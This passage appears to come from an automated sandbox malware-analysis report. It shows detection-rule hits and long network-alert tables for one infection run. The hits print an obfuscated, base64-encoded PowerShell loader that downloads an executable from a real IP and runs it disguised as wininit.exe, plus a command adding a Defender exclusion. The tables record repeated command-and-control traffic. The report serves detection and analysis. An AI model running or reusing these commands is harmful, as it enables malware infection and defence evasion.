y82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline", ProcessId: 3604, ProcessName: csc.exe
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6668, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\caspol[1].exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 4416, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 4364, ProcessName: powershell.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6668, TargetFilename: C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7108, ProcessName: svchost.exe

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline", ProcessId: 3604, ProcessName: csc.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:05.601815+010020220501A Network Trojan was detected66.63.187.23180192.168.2.449730TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:05.742219+010020220511A Network Trojan was detected66.63.187.23180192.168.2.449730TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:13.563784+010020243121A Network Trojan was detected192.168.2.44973494.156.177.4180TCP
            2024-11-20T10:57:14.904339+010020243121A Network Trojan was detected192.168.2.44973594.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:12.808002+010020253811Malware Command and Control Activity Detected192.168.2.44973494.156.177.4180TCP
            2024-11-20T10:57:13.757343+010020253811Malware Command and Control Activity Detected192.168.2.44973594.156.177.4180TCP
            2024-11-20T10:57:15.026901+010020253811Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
            2024-11-20T10:57:16.128443+010020253811Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
            2024-11-20T10:57:17.172162+010020253811Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
            2024-11-20T10:57:18.095135+010020253811Malware Command and Control Activity Detected192.168.2.44974294.156.177.4180TCP
            2024-11-20T10:57:19.188469+010020253811Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
            2024-11-20T10:57:20.015773+010020253811Malware Command and Control Activity Detected192.168.2.44974894.156.177.4180TCP
            2024-11-20T10:57:21.098851+010020253811Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
            2024-11-20T10:57:22.128961+010020253811Malware Command and Control Activity Detected192.168.2.44975194.156.177.4180TCP
            2024-11-20T10:57:23.051375+010020253811Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
            2024-11-20T10:57:23.952106+010020253811Malware Command and Control Activity Detected192.168.2.44975394.156.177.4180TCP
            2024-11-20T10:57:24.855713+010020253811Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
            2024-11-20T10:57:25.934109+010020253811Malware Command and Control Activity Detected192.168.2.44975594.156.177.4180TCP
            2024-11-20T10:57:26.983156+010020253811Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
            2024-11-20T10:57:27.893409+010020253811Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
            2024-11-20T10:57:28.799350+010020253811Malware Command and Control Activity Detected192.168.2.44975894.156.177.4180TCP
            2024-11-20T10:57:29.726326+010020253811Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
            2024-11-20T10:57:30.667112+010020253811Malware Command and Control Activity Detected192.168.2.44976094.156.177.4180TCP
            2024-11-20T10:57:31.597321+010020253811Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
            2024-11-20T10:57:32.534728+010020253811Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
            2024-11-20T10:57:33.800604+010020253811Malware Command and Control Activity Detected192.168.2.44976394.156.177.4180TCP
            2024-11-20T10:57:34.722224+010020253811Malware Command and Control Activity Detected192.168.2.45848994.156.177.4180TCP
            2024-11-20T10:57:35.630460+010020253811Malware Command and Control Activity Detected192.168.2.45849194.156.177.4180TCP
            2024-11-20T10:57:36.546091+010020253811Malware Command and Control Activity Detected192.168.2.45849294.156.177.4180TCP
            2024-11-20T10:57:37.558372+010020253811Malware Command and Control Activity Detected192.168.2.45849394.156.177.4180TCP
            2024-11-20T10:57:38.444140+010020253811Malware Command and Control Activity Detected192.168.2.45849594.156.177.4180TCP
            2024-11-20T10:57:39.350219+010020253811Malware Command and Control Activity Detected192.168.2.45849794.156.177.4180TCP
            2024-11-20T10:57:40.390682+010020253811Malware Command and Control Activity Detected192.168.2.45849894.156.177.4180TCP
            2024-11-20T10:57:41.280822+010020253811Malware Command and Control Activity Detected192.168.2.45849994.156.177.4180TCP
            2024-11-20T10:57:42.194530+010020253811Malware Command and Control Activity Detected192.168.2.45850094.156.177.4180TCP
            2024-11-20T10:57:43.109049+010020253811Malware Command and Control Activity Detected192.168.2.45850194.156.177.4180TCP
            2024-11-20T10:57:44.036671+010020253811Malware Command and Control Activity Detected192.168.2.45850294.156.177.4180TCP
            2024-11-20T10:57:44.953136+010020253811Malware Command and Control Activity Detected192.168.2.45850394.156.177.4180TCP
            2024-11-20T10:57:45.861829+010020253811Malware Command and Control Activity Detected192.168.2.45850494.156.177.4180TCP
            2024-11-20T10:57:46.774217+010020253811Malware Command and Control Activity Detected192.168.2.45850594.156.177.4180TCP
            2024-11-20T10:57:47.730504+010020253811Malware Command and Control Activity Detected192.168.2.45850694.156.177.4180TCP
            2024-11-20T10:57:48.614779+010020253811Malware Command and Control Activity Detected192.168.2.45850794.156.177.4180TCP
            2024-11-20T10:57:49.520289+010020253811Malware Command and Control Activity Detected192.168.2.45850894.156.177.4180TCP
            2024-11-20T10:57:50.448704+010020253811Malware Command and Control Activity Detected192.168.2.45850994.156.177.4180TCP
            2024-11-20T10:57:51.379035+010020253811Malware Command and Control Activity Detected192.168.2.45851094.156.177.4180TCP
            2024-11-20T10:57:52.282631+010020253811Malware Command and Control Activity Detected192.168.2.45851194.156.177.4180TCP
            2024-11-20T10:57:53.201630+010020253811Malware Command and Control Activity Detected192.168.2.45851294.156.177.4180TCP
            2024-11-20T10:57:54.109455+010020253811Malware Command and Control Activity Detected192.168.2.45851394.156.177.4180TCP
            2024-11-20T10:57:55.033419+010020253811Malware Command and Control Activity Detected192.168.2.45851494.156.177.4180TCP
            2024-11-20T10:57:56.039529+010020253811Malware Command and Control Activity Detected192.168.2.45851594.156.177.4180TCP
            2024-11-20T10:57:56.955480+010020253811Malware Command and Control Activity Detected192.168.2.45851694.156.177.4180TCP
            2024-11-20T10:57:57.984069+010020253811Malware Command and Control Activity Detected192.168.2.45851894.156.177.4180TCP
            2024-11-20T10:57:58.889596+010020253811Malware Command and Control Activity Detected192.168.2.45852494.156.177.4180TCP
            2024-11-20T10:57:59.787877+010020253811Malware Command and Control Activity Detected192.168.2.45853094.156.177.4180TCP
            2024-11-20T10:58:00.691489+010020253811Malware Command and Control Activity Detected192.168.2.45853694.156.177.4180TCP
            2024-11-20T10:58:01.582641+010020253811Malware Command and Control Activity Detected192.168.2.45854394.156.177.4180TCP
            2024-11-20T10:58:02.624665+010020253811Malware Command and Control Activity Detected192.168.2.45855394.156.177.4180TCP
            2024-11-20T10:58:03.519338+010020253811Malware Command and Control Activity Detected192.168.2.45855994.156.177.4180TCP
            2024-11-20T10:58:04.545050+010020253811Malware Command and Control Activity Detected192.168.2.45856594.156.177.4180TCP
            2024-11-20T10:58:05.453999+010020253811Malware Command and Control Activity Detected192.168.2.45857294.156.177.4180TCP
            2024-11-20T10:58:06.367844+010020253811Malware Command and Control Activity Detected192.168.2.45858294.156.177.4180TCP
            2024-11-20T10:58:07.287006+010020253811Malware Command and Control Activity Detected192.168.2.45858894.156.177.4180TCP
            2024-11-20T10:58:08.176054+010020253811Malware Command and Control Activity Detected192.168.2.45859494.156.177.4180TCP
            2024-11-20T10:58:09.065860+010020253811Malware Command and Control Activity Detected192.168.2.45860094.156.177.4180TCP
            2024-11-20T10:58:09.959629+010020253811Malware Command and Control Activity Detected192.168.2.45860694.156.177.4180TCP
            2024-11-20T10:58:10.847503+010020253811Malware Command and Control Activity Detected192.168.2.45861394.156.177.4180TCP
            2024-11-20T10:58:11.824399+010020253811Malware Command and Control Activity Detected192.168.2.45862394.156.177.4180TCP
            2024-11-20T10:58:12.724589+010020253811Malware Command and Control Activity Detected192.168.2.45862994.156.177.4180TCP
            2024-11-20T10:58:13.658490+010020253811Malware Command and Control Activity Detected192.168.2.45863594.156.177.4180TCP
            2024-11-20T10:58:14.545997+010020253811Malware Command and Control Activity Detected192.168.2.45864194.156.177.4180TCP
            2024-11-20T10:58:15.460583+010020253811Malware Command and Control Activity Detected192.168.2.45865094.156.177.4180TCP
            2024-11-20T10:58:16.391719+010020253811Malware Command and Control Activity Detected192.168.2.45865794.156.177.4180TCP
            2024-11-20T10:58:17.293396+010020253811Malware Command and Control Activity Detected192.168.2.45866494.156.177.4180TCP
            2024-11-20T10:58:18.186000+010020253811Malware Command and Control Activity Detected192.168.2.45867094.156.177.4180TCP
            2024-11-20T10:58:19.112622+010020253811Malware Command and Control Activity Detected192.168.2.45867594.156.177.4180TCP
            2024-11-20T10:58:20.136054+010020253811Malware Command and Control Activity Detected192.168.2.45868394.156.177.4180TCP
            2024-11-20T10:58:21.045421+010020253811Malware Command and Control Activity Detected192.168.2.45868894.156.177.4180TCP
            2024-11-20T10:58:21.935753+010020253811Malware Command and Control Activity Detected192.168.2.45869594.156.177.4180TCP
            2024-11-20T10:58:22.855310+010020253811Malware Command and Control Activity Detected192.168.2.45870194.156.177.4180TCP
            2024-11-20T10:58:23.760310+010020253811Malware Command and Control Activity Detected192.168.2.45870894.156.177.4180TCP
            2024-11-20T10:58:24.639781+010020253811Malware Command and Control Activity Detected192.168.2.45871594.156.177.4180TCP
            2024-11-20T10:58:25.552646+010020253811Malware Command and Control Activity Detected192.168.2.45872394.156.177.4180TCP
            2024-11-20T10:58:26.433858+010020253811Malware Command and Control Activity Detected192.168.2.45873094.156.177.4180TCP
            2024-11-20T10:58:27.437349+010020253811Malware Command and Control Activity Detected192.168.2.45873694.156.177.4180TCP
            2024-11-20T10:58:28.325967+010020253811Malware Command and Control Activity Detected192.168.2.45874294.156.177.4180TCP
            2024-11-20T10:58:29.219984+010020253811Malware Command and Control Activity Detected192.168.2.45875294.156.177.4180TCP
            2024-11-20T10:58:30.135328+010020253811Malware Command and Control Activity Detected192.168.2.45875894.156.177.4180TCP
            2024-11-20T10:58:31.029059+010020253811Malware Command and Control Activity Detected192.168.2.45876494.156.177.4180TCP
            2024-11-20T10:58:31.910533+010020253811Malware Command and Control Activity Detected192.168.2.45877094.156.177.4180TCP
            2024-11-20T10:58:32.925547+010020253811Malware Command and Control Activity Detected192.168.2.45877794.156.177.4180TCP
            2024-11-20T10:58:33.816974+010020253811Malware Command and Control Activity Detected192.168.2.45878694.156.177.4180TCP
            2024-11-20T10:58:34.747068+010020253811Malware Command and Control Activity Detected192.168.2.45879294.156.177.4180TCP
            2024-11-20T10:58:35.646259+010020253811Malware Command and Control Activity Detected192.168.2.45879994.156.177.4180TCP
            2024-11-20T10:58:36.544139+010020253811Malware Command and Control Activity Detected192.168.2.45880694.156.177.4180TCP
            2024-11-20T10:58:37.437340+010020253811Malware Command and Control Activity Detected192.168.2.45881294.156.177.4180TCP
            2024-11-20T10:58:38.343067+010020253811Malware Command and Control Activity Detected192.168.2.45881894.156.177.4180TCP
            2024-11-20T10:58:39.243872+010020253811Malware Command and Control Activity Detected192.168.2.45882794.156.177.4180TCP
            2024-11-20T10:58:40.146749+010020253811Malware Command and Control Activity Detected192.168.2.45882894.156.177.4180TCP
            2024-11-20T10:58:41.034533+010020253811Malware Command and Control Activity Detected192.168.2.45882994.156.177.4180TCP
            2024-11-20T10:58:41.944294+010020253811Malware Command and Control Activity Detected192.168.2.45883094.156.177.4180TCP
            2024-11-20T10:58:42.863234+010020253811Malware Command and Control Activity Detected192.168.2.45883194.156.177.4180TCP
            2024-11-20T10:58:43.784646+010020253811Malware Command and Control Activity Detected192.168.2.45883294.156.177.4180TCP
            2024-11-20T10:58:45.036254+010020253811Malware Command and Control Activity Detected192.168.2.45883394.156.177.4180TCP
            2024-11-20T10:58:45.931402+010020253811Malware Command and Control Activity Detected192.168.2.45883494.156.177.4180TCP
            2024-11-20T10:58:46.868272+010020253811Malware Command and Control Activity Detected192.168.2.45883594.156.177.4180TCP
            2024-11-20T10:58:47.801637+010020253811Malware Command and Control Activity Detected192.168.2.45883694.156.177.4180TCP
            2024-11-20T10:58:48.719401+010020253811Malware Command and Control Activity Detected192.168.2.45883794.156.177.4180TCP
            2024-11-20T10:58:49.631590+010020253811Malware Command and Control Activity Detected192.168.2.45883894.156.177.4180TCP
            2024-11-20T10:58:50.531924+010020253811Malware Command and Control Activity Detected192.168.2.45883994.156.177.4180TCP
            2024-11-20T10:58:51.462507+010020253811Malware Command and Control Activity Detected192.168.2.45884094.156.177.4180TCP
            2024-11-20T10:58:52.365083+010020253811Malware Command and Control Activity Detected192.168.2.45884194.156.177.4180TCP
            2024-11-20T10:58:53.422435+010020253811Malware Command and Control Activity Detected192.168.2.45884294.156.177.4180TCP
            2024-11-20T10:58:54.359199+010020253811Malware Command and Control Activity Detected192.168.2.45884394.156.177.4180TCP
            2024-11-20T10:58:55.384693+010020253811Malware Command and Control Activity Detected192.168.2.45884494.156.177.4180TCP
            2024-11-20T10:58:56.456663+010020253811Malware Command and Control Activity Detected192.168.2.45884594.156.177.4180TCP
            2024-11-20T10:58:57.368693+010020253811Malware Command and Control Activity Detected192.168.2.45884694.156.177.4180TCP
            2024-11-20T10:58:58.299878+010020253811Malware Command and Control Activity Detected192.168.2.45884794.156.177.4180TCP
            2024-11-20T10:58:59.223139+010020253811Malware Command and Control Activity Detected192.168.2.45884894.156.177.4180TCP
            2024-11-20T10:59:00.315009+010020253811Malware Command and Control Activity Detected192.168.2.45884994.156.177.4180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T10:57:15.987856+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449737TCP
            2024-11-20T10:57:17.006051+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449739TCP
            2024-11-20T10:57:17.936080+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449740TCP
            2024-11-20T10:57:18.832714+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449742TCP
            2024-11-20T10:57:19.868969+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449746TCP
            2024-11-20T10:57:20.949030+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449748TCP
            2024-11-20T10:57:21.975270+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449750TCP
            2024-11-20T10:57:22.904758+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449751TCP
            2024-11-20T10:57:23.808026+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449752TCP
            2024-11-20T10:57:24.690524+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449753TCP
            2024-11-20T10:57:25.795228+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449754TCP
            2024-11-20T10:57:26.827906+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449755TCP
            2024-11-20T10:57:27.744857+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449756TCP
            2024-11-20T10:57:28.642340+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449757TCP
            2024-11-20T10:57:29.549556+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449758TCP
            2024-11-20T10:57:30.514533+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449759TCP
            2024-11-20T10:57:31.425324+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449760TCP
            2024-11-20T10:57:32.385510+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449761TCP
            2024-11-20T10:57:33.640881+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449762TCP
            2024-11-20T10:57:34.567581+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449763TCP
            2024-11-20T10:57:35.471497+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458489TCP
            2024-11-20T10:57:36.400812+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458491TCP
            2024-11-20T10:57:37.289801+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458492TCP
            2024-11-20T10:57:38.284188+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458493TCP
            2024-11-20T10:57:39.187672+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458495TCP
            2024-11-20T10:57:40.133545+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458497TCP
            2024-11-20T10:57:41.142696+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458498TCP
            2024-11-20T10:57:42.033745+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458499TCP
            2024-11-20T10:57:42.955102+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458500TCP
            2024-11-20T10:57:43.877806+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458501TCP
            2024-11-20T10:57:44.784399+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458502TCP
            2024-11-20T10:57:45.703555+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458503TCP
            2024-11-20T10:57:46.618695+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458504TCP
            2024-11-20T10:57:47.570860+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458505TCP
            2024-11-20T10:57:48.467331+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458506TCP
            2024-11-20T10:57:49.360365+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458507TCP
            2024-11-20T10:57:50.268579+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458508TCP
            2024-11-20T10:57:51.219567+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458509TCP
            2024-11-20T10:57:52.140914+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458510TCP
            2024-11-20T10:57:53.049334+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458511TCP
            2024-11-20T10:57:53.956364+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458512TCP
            2024-11-20T10:57:54.880536+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458513TCP
            2024-11-20T10:57:55.762200+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458514TCP
            2024-11-20T10:57:56.804995+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458515TCP
            2024-11-20T10:57:57.817446+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458516TCP
            2024-11-20T10:57:58.738049+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458518TCP
            2024-11-20T10:57:59.636685+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458524TCP
            2024-11-20T10:58:00.545760+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458530TCP
            2024-11-20T10:58:01.438503+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458536TCP
            2024-11-20T10:58:02.348681+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458543TCP
            2024-11-20T10:58:03.364160+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458553TCP
            2024-11-20T10:58:04.406032+010020254831A Network Trojan was detected94.156.177.4180192.168.2.458559TCP
